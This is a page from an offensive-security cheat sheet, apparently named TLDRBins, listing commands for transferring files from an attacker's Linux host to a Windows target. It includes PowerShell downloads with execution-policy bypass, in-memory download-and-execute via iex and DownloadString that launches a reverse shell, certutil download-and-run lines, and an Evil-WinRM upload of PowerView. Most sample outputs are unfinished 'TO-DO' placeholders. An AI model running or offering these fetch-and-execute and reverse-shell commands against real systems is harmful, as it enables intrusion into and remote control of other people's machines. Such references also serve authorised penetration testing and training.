TLDRBins TLDRBins / File Transfer (Linux to Windows)


Usage Tips:

  • Click on a keyword to enable inline editing.
  • Click inside a code block to copy (excludes comments).
  • Use the button to view examples.
  • Click outside to collapse all examples.

Start a Local HTTP Server

python3 -m http.server <LOCAL_PORT>
Sample Output: $ python3 -m http.server 8443 Serving HTTP on 0.0.0.0 port 8443 (http://0.0.0.0:8443/) ...

# Invoke-WebRequest iwr http://<LOCAL_IP>:<LOCAL_PORT>/<FILE> -o C:\ProgramData\<FILE>
Sample Output: TO-DO
# Wget powershell -ep bypass wget <LOCAL_IP>:<LOCAL_PORT>/<FILE> -Outfile C:\ProgramData\<FILE>
Sample Output: TO-DO
# Curl powershell -ep bypass curl <LOCAL_IP>:<LOCAL_PORT>/<FILE> -Outfile C:\ProgramData\<FILE>
Sample Output: TO-DO

Note: curl and wget are alias to Invoke-WebRequest

# Load into memory and Run
Sample Output: TO-DO
# Invoke-Expression iex (New-Object Net.WebClient).DownloadString('http://<LOCAL_IP>:<LOCAL_PORT>/<FILE>');Invoke-PowerShellTcp -Reverse -IPAddress <LOCAL_IP> -Port <LOCAL_PORT>
Sample Output: TO-DO
# Short version iex (iwr http://<LOCAL_IP>:<LOCAL_PORT>/<FILE> -UseBasicParsing)
Sample Output: TO-DO

Ref: rev.ps1

Start a Local HTTP Server

python3 -m http.server <LOCAL_PORT>
Sample Output: TO-DO

certutil -urlcache -split -f http://<LOCAL_IP>:<LOCAL_PORT>/<FILE> C:\ProgramData\<FILE>
Sample Output: TO-DO
# Upload and Run certutil -urlcache -split -f http://<LOCAL_IP>:<LOCAL_PORT>/<FILE> C:\ProgramData\<FILE> && C:\ProgramData\<FILE>
Sample Output: TO-DO
# Evil-winrm built-in function upload '<LOCAL_FILE_PATH>' "C:\ProgramData\<FILE>"
Sample Output: *Evil-WinRM* PS C:\programdata> upload /home/kali/PowerView.ps1 C:\ProgramData\PowerView.ps1 Info: Uploading /home/kali/PowerView.ps1 to C:\ProgramData\PowerView.ps1 Data: 1027036 bytes of 1027036 bytes copied Info: Upload successful!